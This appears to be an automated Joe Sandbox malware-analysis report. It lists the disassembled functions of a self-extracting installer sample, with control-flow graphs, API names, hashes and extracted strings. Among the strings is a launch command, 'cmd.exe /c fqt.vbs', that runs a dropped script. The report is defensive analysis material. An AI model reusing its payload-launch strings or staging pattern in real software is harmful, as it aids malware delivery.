                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                      • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                      • API String ID: 383838535-3544074861
                                                                      • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                      • Instruction ID: f525d3351960948ffc88f995b23e4318374b51521e19862885d8ec6e6350829d
                                                                      • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                      • Instruction Fuzzy Hash: F7E17C62E08A8A95EB11EF50E8402BFA7A1EB55784FD84137DB4D03795DF3DE50ACB20
                                                                      Function 00007FF7D6FD66C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 238 7ff7d6fd66c4-7ff7d6fd6724 call 7ff7d6fd5050 LocalAlloc 241 7ff7d6fd6756-7ff7d6fd676a call 7ff7d6fd5050 238->241 242 7ff7d6fd6726-7ff7d6fd6749 call 7ff7d6fd4dcc call 7ff7d6fd7700 238->242 247 7ff7d6fd67a5-7ff7d6fd67ea lstrcmpA LocalFree 241->247 248 7ff7d6fd676c-7ff7d6fd67a3 call 7ff7d6fd4dcc LocalFree 241->248 254 7ff7d6fd674f-7ff7d6fd6751 242->254 251 7ff7d6fd67ec-7ff7d6fd67ee 247->251 252 7ff7d6fd6837-7ff7d6fd683d 247->252 248->254 258 7ff7d6fd67f0-7ff7d6fd67f9 251->258 259 7ff7d6fd67fb 251->259 255 7ff7d6fd6843-7ff7d6fd6849 252->255 256 7ff7d6fd6b14-7ff7d6fd6b38 call 7ff7d6fd7ac8 252->256 260 7ff7d6fd6b3a-7ff7d6fd6b66 call 7ff7d6fd8470 254->260 255->256 262 7ff7d6fd684f-7ff7d6fd6870 GetTempPathA 255->262 256->260 258->259 263 7ff7d6fd67fe-7ff7d6fd680e call 7ff7d6fd64e4 258->263 259->263 266 7ff7d6fd6872-7ff7d6fd687e call 7ff7d6fd64e4 262->266 267 7ff7d6fd68ad-7ff7d6fd68b9 262->267 274 7ff7d6fd6814-7ff7d6fd6832 call 7ff7d6fd4dcc 263->274 275 7ff7d6fd6b0f-7ff7d6fd6b12 263->275 273 7ff7d6fd6883-7ff7d6fd6885 266->273 272 7ff7d6fd68bc-7ff7d6fd68bf 267->272 276 7ff7d6fd68c4-7ff7d6fd68ce 272->276 273->275 279 7ff7d6fd688b-7ff7d6fd6895 call 7ff7d6fd2468 273->279 274->254 275->260 277 7ff7d6fd68d0-7ff7d6fd68d5 276->277 278 7ff7d6fd68e1-7ff7d6fd68f3 276->278 277->278 282 7ff7d6fd68d7-7ff7d6fd68df 277->282 283 7ff7d6fd6adb-7ff7d6fd6b04 GetWindowsDirectoryA call 7ff7d6fd6ca4 278->283 284 7ff7d6fd68f9-7ff7d6fd690f GetDriveTypeA 278->284 279->267 292 7ff7d6fd6897-7ff7d6fd68a7 call 7ff7d6fd64e4 279->292 282->276 282->278 283->254 297 7ff7d6fd6b0a 283->297 286 7ff7d6fd6916-7ff7d6fd692a GetFileAttributesA 284->286 287 7ff7d6fd6911-7ff7d6fd6914 284->287 290 7ff7d6fd6930-7ff7d6fd6933 286->290 291 7ff7d6fd69bd-7ff7d6fd69d0 call 7ff7d6fd6ca4 286->291 287->286 287->290 294 7ff7d6fd6935-7ff7d6fd693f 290->294 295 7ff7d6fd69ad 290->295 303 7ff7d6fd69f4-7ff7d6fd6a00 call 7ff7d6fd2468 291->303 304 7ff7d6fd69d2-7ff7d6fd69de call 7ff7d6fd2468 291->304 292->267 292->275 300 7ff7d6fd69b1-7ff7d6fd69b8 294->300 301 7ff7d6fd6941-7ff7d6fd6953 294->301 295->300 297->272 306 7ff7d6fd6ad2-7ff7d6fd6ad5 300->306 301->300 305 7ff7d6fd6955-7ff7d6fd6981 GetDiskFreeSpaceA 301->305 314 7ff7d6fd6a16-7ff7d6fd6a3e call 7ff7d6fd7ba8 GetFileAttributesA 303->314 315 7ff7d6fd6a02-7ff7d6fd6a11 GetWindowsDirectoryA 303->315 304->295 313 7ff7d6fd69e0-7ff7d6fd69f2 call 7ff7d6fd6ca4 304->313 305->295 309 7ff7d6fd6983-7ff7d6fd69a4 MulDiv 305->309 306->283 306->284 309->295 312 7ff7d6fd69a6-7ff7d6fd69ab 309->312 312->291 312->295 313->295 313->303 320 7ff7d6fd6a55 314->320 321 7ff7d6fd6a40-7ff7d6fd6a53 CreateDirectoryA 314->321 315->314 322 7ff7d6fd6a58-7ff7d6fd6a5a 320->322 321->322 323 7ff7d6fd6a5c-7ff7d6fd6a6b 322->323 324 7ff7d6fd6a6d-7ff7d6fd6a8e SetFileAttributesA 322->324 323->306 325 7ff7d6fd6a91-7ff7d6fd6a9b 324->325 326 7ff7d6fd6aaf-7ff7d6fd6acc call 7ff7d6fd64e4 325->326 327 7ff7d6fd6a9d-7ff7d6fd6aa3 325->327 326->275 331 7ff7d6fd6ace 326->331 327->326 328 7ff7d6fd6aa5-7ff7d6fd6aad 327->328 328->325 328->326 331->306
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                      • API String ID: 3973824516-2740620654
                                                                      • Opcode ID: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                      • Instruction ID: e7a212ec481ba9bcefafd3b7226d20ed5cd92ad8ea7c9aff3a4ba696501201bd
                                                                      • Opcode Fuzzy Hash: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                                      • Instruction Fuzzy Hash: 00D13122E58A4A86EB10AB1098502BFF7A1FB96744FD85136DB4D43695DF3DF406CF20
                                                                      Function 00007FF7D6FD2DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 332 7ff7d6fd2db4-7ff7d6fd2e4d call 7ff7d6fd8b09 memset * 2 call 7ff7d6fd5050 337 7ff7d6fd2e53-7ff7d6fd2e94 CreateEventA SetEvent call 7ff7d6fd5050 332->337 338 7ff7d6fd30a5 332->338 344 7ff7d6fd2ec3-7ff7d6fd2ecb 337->344 345 7ff7d6fd2e96-7ff7d6fd2ea0 337->345 340 7ff7d6fd30aa-7ff7d6fd30b9 call 7ff7d6fd4dcc 338->340 343 7ff7d6fd30be 340->343 347 7ff7d6fd30c0-7ff7d6fd30e3 call 7ff7d6fd8470 343->347 348 7ff7d6fd2ed5-7ff7d6fd2ef0 call 7ff7d6fd5050 344->348 349 7ff7d6fd2ecd-7ff7d6fd2ecf 344->349 346 7ff7d6fd2ea2-7ff7d6fd2ebe call 7ff7d6fd4dcc 345->346 346->343 359 7ff7d6fd2ef2-7ff7d6fd2efc 348->359 360 7ff7d6fd2efe-7ff7d6fd2f1c CreateMutexA 348->360 349->348 352 7ff7d6fd2fa3-7ff7d6fd2fb3 call 7ff7d6fd70a8 349->352 361 7ff7d6fd2fc4-7ff7d6fd2fcb 352->361 362 7ff7d6fd2fb5-7ff7d6fd2fbf 352->362 359->346 360->352 363 7ff7d6fd2f22-7ff7d6fd2f33 GetLastError 360->363 364 7ff7d6fd2fcd-7ff7d6fd2fd9 call 7ff7d6fd204c 361->364 365 7ff7d6fd2fde-7ff7d6fd2ffd FindResourceExA 361->365 362->340 363->352 366 7ff7d6fd2f35-7ff7d6fd2f48 363->366 364->343 368 7ff7d6fd3014-7ff7d6fd301b 365->368 369 7ff7d6fd2fff-7ff7d6fd3011 LoadResource 365->369 370 7ff7d6fd2f62-7ff7d6fd2f7f call 7ff7d6fd4dcc 366->370 371 7ff7d6fd2f4a-7ff7d6fd2f60 call 7ff7d6fd4dcc 366->371 375 7ff7d6fd301d-7ff7d6fd3024 #17 368->375 376 7ff7d6fd3029-7ff7d6fd3030 368->376 369->368 370->352 382 7ff7d6fd2f81-7ff7d6fd2f9e CloseHandle 370->382 371->382 375->376 377 7ff7d6fd3032-7ff7d6fd3035 376->377 378 7ff7d6fd303a-7ff7d6fd3044 call 7ff7d6fd3bf4 376->378 377->347 378->343 384 7ff7d6fd3046-7ff7d6fd3055 378->384 382->343 384->377 385 7ff7d6fd3057-7ff7d6fd3061 384->385 385->377 386 7ff7d6fd3063-7ff7d6fd306a 385->386 386->377 387 7ff7d6fd306c-7ff7d6fd3073 call 7ff7d6fd12ec 386->387 387->377 390 7ff7d6fd3075-7ff7d6fd30a1 call 7ff7d6fd7ac8 387->390 390->343 393 7ff7d6fd30a3 390->393 393->377
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                      • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cmd.exe /c fqt.vbs
                                                                      • API String ID: 3100096412-2915214181
                                                                      • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                      • Instruction ID: b4531497e6df0bce19e9bea8480013bbef06522c6621189be7c3268a4a9fcd2b
                                                                      • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                      • Instruction Fuzzy Hash: 39814822E08A4A86F720BB14AC043BFA691AB95789FCC5137DB4D42695CF7CB407CF20
                                                                      Function 00007FF7D6FD6CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 394 7ff7d6fd6ca4-7ff7d6fd6d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff7d6fd6d3f-7ff7d6fd6d7a GetDiskFreeSpaceA 394->395 396 7ff7d6fd6d12-7ff7d6fd6d3a call 7ff7d6fd4dcc call 7ff7d6fd7700 394->396 398 7ff7d6fd6f63-7ff7d6fd6fb8 memset call 7ff7d6fd7700 GetLastError FormatMessageA 395->398 399 7ff7d6fd6d80-7ff7d6fd6da8 MulDiv 395->399 411 7ff7d6fd6fe9 396->411 408 7ff7d6fd6fbd-7ff7d6fd6fe4 call 7ff7d6fd4dcc SetCurrentDirectoryA 398->408 399->398 402 7ff7d6fd6dae-7ff7d6fd6de4 GetVolumeInformationA 399->402 405 7ff7d6fd6e45-7ff7d6fd6e68 SetCurrentDirectoryA 402->405 406 7ff7d6fd6de6-7ff7d6fd6e40 memset call 7ff7d6fd7700 GetLastError FormatMessageA 402->406 410 7ff7d6fd6e6c-7ff7d6fd6e73 405->410 406->408 408->411 414 7ff7d6fd6e75-7ff7d6fd6e7a 410->414 415 7ff7d6fd6e86-7ff7d6fd6e99 410->415 418 7ff7d6fd6feb-7ff7d6fd701a call 7ff7d6fd8470 411->418 414->415 419 7ff7d6fd6e7c-7ff7d6fd6e84 414->419 416 7ff7d6fd6e9d-7ff7d6fd6ea0 415->416 420 7ff7d6fd6ea2-7ff7d6fd6eac 416->420 421 7ff7d6fd6eae-7ff7d6fd6eb2 416->421 419->410 419->415 420->416 420->421 423 7ff7d6fd6eb4-7ff7d6fd6ed3 call 7ff7d6fd4dcc 421->423 424 7ff7d6fd6ed8-7ff7d6fd6edf 421->424 423->411 427 7ff7d6fd6ee1-7ff7d6fd6ee9 424->427 428 7ff7d6fd6f0e-7ff7d6fd6f1f 424->428 427->428 430 7ff7d6fd6eeb-7ff7d6fd6f0c 427->430 431 7ff7d6fd6f22-7ff7d6fd6f2a 428->431 430->431 432 7ff7d6fd6f46-7ff7d6fd6f49 431->432 433 7ff7d6fd6f2c-7ff7d6fd6f30 431->433 434 7ff7d6fd6f4f-7ff7d6fd6f52 432->434 435 7ff7d6fd6f4b-7ff7d6fd6f4d 432->435 436 7ff7d6fd6f32 433->436 434->436 435->436 437 7ff7d6fd6f54-7ff7d6fd6f5e 436->437 438 7ff7d6fd6f34-7ff7d6fd6f41 call 7ff7d6fd24f8 436->438 437->418 438->418
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 4237285672-305352358
                                                                      • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                      • Instruction ID: 54b4c91dc2ee85f51a2b939936c6e127da43138bc864b67ea6a2d11590ab0f82
                                                                      • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                      • Instruction Fuzzy Hash: 4CA14D36A18B4586E720AB60E8406AFFBA5FB89744FD84136DB4D43A54DF3CE44ACF10
                                                                      Function 00007FF7D6FD5D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                      • String ID: *MEMCAB$CABINET
                                                                      • API String ID: 1305606123-2642027498
                                                                      • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                      • Instruction ID: a140040357018f0e08f6d761844246c889ae3c849dd12f4ec61bb085b4dda35d
                                                                      • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                      • Instruction Fuzzy Hash: 6E51D731E08F4A86EB10AB50AC5477EEBA5FB89745FC88236DA4D46654DF7CF0068F20
                                                                      Function 00007FF7D6FD30EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151libraryfileloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 525 7ff7d6fd30ec-7ff7d6fd3114 526 7ff7d6fd3116-7ff7d6fd311c 525->526 527 7ff7d6fd3141-7ff7d6fd3148 call 7ff7d6fd5fe4 525->527 528 7ff7d6fd3134-7ff7d6fd313b call 7ff7d6fd3f74 526->528 529 7ff7d6fd311e call 7ff7d6fd60a4 526->529 536 7ff7d6fd3236 527->536 537 7ff7d6fd314e-7ff7d6fd3155 call 7ff7d6fd66c4 527->537 528->527 528->536 534 7ff7d6fd3123-7ff7d6fd3125 529->534 534->536 538 7ff7d6fd312b-7ff7d6fd3132 534->538 540 7ff7d6fd3238-7ff7d6fd3258 call 7ff7d6fd8470 536->540 537->536 544 7ff7d6fd315b-7ff7d6fd319d GetSystemDirectoryA call 7ff7d6fd7ba8 LoadLibraryA 537->544 538->527 538->528 547 7ff7d6fd319f-7ff7d6fd31b8 GetProcAddress 544->547 548 7ff7d6fd31c9-7ff7d6fd31de FreeLibrary 544->548 547->548 549 7ff7d6fd31ba-7ff7d6fd31c3 DecryptFileA 547->549 550 7ff7d6fd3273-7ff7d6fd3288 SetCurrentDirectoryA 548->550 551 7ff7d6fd31e4-7ff7d6fd31ea 548->551 549->548 552 7ff7d6fd3291-7ff7d6fd3297 550->552 553 7ff7d6fd328a-7ff7d6fd328f 550->553 551->550 554 7ff7d6fd31f0-7ff7d6fd320b GetWindowsDirectoryA 551->554 556 7ff7d6fd332d-7ff7d6fd3335 552->556 557 7ff7d6fd329d-7ff7d6fd32a4 552->557 555 7ff7d6fd3212-7ff7d6fd3230 call 7ff7d6fd4dcc call 7ff7d6fd7700 553->555 558 7ff7d6fd320d 554->558 559 7ff7d6fd325a-7ff7d6fd326a call 7ff7d6fd6ca4 554->559 555->536 561 7ff7d6fd3337-7ff7d6fd3339 556->561 562 7ff7d6fd3349 556->562 563 7ff7d6fd32a9-7ff7d6fd32b7 557->563 558->555 565 7ff7d6fd326f-7ff7d6fd3271 559->565 561->562 566 7ff7d6fd333b-7ff7d6fd3342 call 7ff7d6fd2318 561->566 569 7ff7d6fd334b-7ff7d6fd3359 562->569 563->563 567 7ff7d6fd32b9-7ff7d6fd32c0 563->567 565->536 565->550 578 7ff7d6fd3347 566->578 571 7ff7d6fd32c2-7ff7d6fd32c9 567->571 572 7ff7d6fd32fb call 7ff7d6fd5d90 567->572 574 7ff7d6fd3376-7ff7d6fd337d 569->574 575 7ff7d6fd335b-7ff7d6fd3361 569->575 571->572 579 7ff7d6fd32cb-7ff7d6fd32f1 call 7ff7d6fd7ac8 571->579 583 7ff7d6fd3300 572->583 576 7ff7d6fd337f-7ff7d6fd3381 574->576 577 7ff7d6fd3388-7ff7d6fd338d 574->577 575->574 582 7ff7d6fd3363 call 7ff7d6fd40c4 575->582 576->577 585 7ff7d6fd3383 call 7ff7d6fd494c 576->585 577->540 578->569 590 7ff7d6fd32f6-7ff7d6fd32f9 579->590 588 7ff7d6fd3368-7ff7d6fd336a 582->588 587 7ff7d6fd3302 583->587 585->577 591 7ff7d6fd3313-7ff7d6fd3321 call 7ff7d6fd772c 587->591 592 7ff7d6fd3304-7ff7d6fd330e 587->592 588->536 593 7ff7d6fd3370 588->593 590->587 591->536 596 7ff7d6fd3327 591->596 592->536 593->574 596->556
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                      • API String ID: 3010855178-1173327654
                                                                      • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                      • Instruction ID: 3b8eebfc7cefb7c1b1ae2c6ead523f944048f63161d2fd87140be74e83225777
                                                                      • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                                      • Instruction Fuzzy Hash: 9A711922E4CE4B86FA60BB10AD412BFE695AF96745FD84037DB4D42295DF2CF4078E60
                                                                      Function 00007FF7D6FD64E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 597 7ff7d6fd64e4-7ff7d6fd6510 598 7ff7d6fd6516-7ff7d6fd651b call 7ff7d6fd63b8 597->598 599 7ff7d6fd65df-7ff7d6fd65ee 597->599 602 7ff7d6fd6520-7ff7d6fd6522 598->602 601 7ff7d6fd65f1-7ff7d6fd65fb 599->601 603 7ff7d6fd6610-7ff7d6fd661b 601->603 604 7ff7d6fd65fd-7ff7d6fd6603 601->604 605 7ff7d6fd6688-7ff7d6fd668a 602->605 606 7ff7d6fd6528-7ff7d6fd653e 602->606 608 7ff7d6fd661e-7ff7d6fd6628 call 7ff7d6fd6b70 603->608 604->603 607 7ff7d6fd6605-7ff7d6fd660e 604->607 610 7ff7d6fd6698-7ff7d6fd66bc call 7ff7d6fd8470 605->610 609 7ff7d6fd6541-7ff7d6fd654b 606->609 607->601 607->603 620 7ff7d6fd6649-7ff7d6fd664b 608->620 621 7ff7d6fd662a-7ff7d6fd663d CreateDirectoryA 608->621 612 7ff7d6fd6560-7ff7d6fd6575 609->612 613 7ff7d6fd654d-7ff7d6fd6553 609->613 617 7ff7d6fd65cc-7ff7d6fd65dd call 7ff7d6fd7ba8 612->617 618 7ff7d6fd6577-7ff7d6fd658f GetSystemInfo 612->618 613->612 616 7ff7d6fd6555-7ff7d6fd655e 613->616 616->609 616->612 617->608 625 7ff7d6fd6591-7ff7d6fd6594 618->625 626 7ff7d6fd65bb 618->626 622 7ff7d6fd668c-7ff7d6fd6693 620->622 623 7ff7d6fd664d-7ff7d6fd6655 call 7ff7d6fd6ca4 620->623 627 7ff7d6fd663f 621->627 628 7ff7d6fd667d-7ff7d6fd6682 call 7ff7d6fd7700 621->628 622->610 636 7ff7d6fd665a-7ff7d6fd665c 623->636 633 7ff7d6fd6596-7ff7d6fd6599 625->633 634 7ff7d6fd65b2-7ff7d6fd65b9 625->634 629 7ff7d6fd65c2-7ff7d6fd65c7 call 7ff7d6fd7ba8 626->629 627->620 628->605 629->617 638 7ff7d6fd659b-7ff7d6fd659e 633->638 639 7ff7d6fd65a9-7ff7d6fd65b0 633->639 634->629 636->622 640 7ff7d6fd665e-7ff7d6fd6664 636->640 638->617 641 7ff7d6fd65a0-7ff7d6fd65a7 638->641 639->629 640->605 642 7ff7d6fd6666-7ff7d6fd667b RemoveDirectoryA 640->642 641->629 642->605
                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD657C
                                                                      • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD662F
                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD666F
                                                                        • Part of subcall function 00007FF7D6FD63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7D6FD2CE1), ref: 00007FF7D6FD6423
                                                                        • Part of subcall function 00007FF7D6FD63B8: GetFileAttributesA.KERNELBASE ref: 00007FF7D6FD6432
                                                                        • Part of subcall function 00007FF7D6FD63B8: GetTempFileNameA.KERNEL32 ref: 00007FF7D6FD645B
                                                                        • Part of subcall function 00007FF7D6FD63B8: DeleteFileA.KERNEL32 ref: 00007FF7D6FD6473
                                                                        • Part of subcall function 00007FF7D6FD63B8: CreateDirectoryA.KERNEL32 ref: 00007FF7D6FD6484
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                      • API String ID: 1979080616-3374052426
                                                                      • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                      • Instruction ID: f99afc226c4735fda272b17395f8ccee19cbb8ff442fd300bf92454231c88831
                                                                      • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                                      • Instruction Fuzzy Hash: 34517C21E48E4A81FA10AB28AC103BFE3A4AF55740FDD4137CB4E46295DF7CF40ACA20
                                                                      Function 00007FF7D6FD473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115processsynchronizationwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 3183975587-3916222277
                                                                      • Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
                                                                      • Instruction ID: 7a8f6f2a44e5da50753c5cb4ebed11276df9dc9edf452b80b5fabdc14c58a411
                                                                      • Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
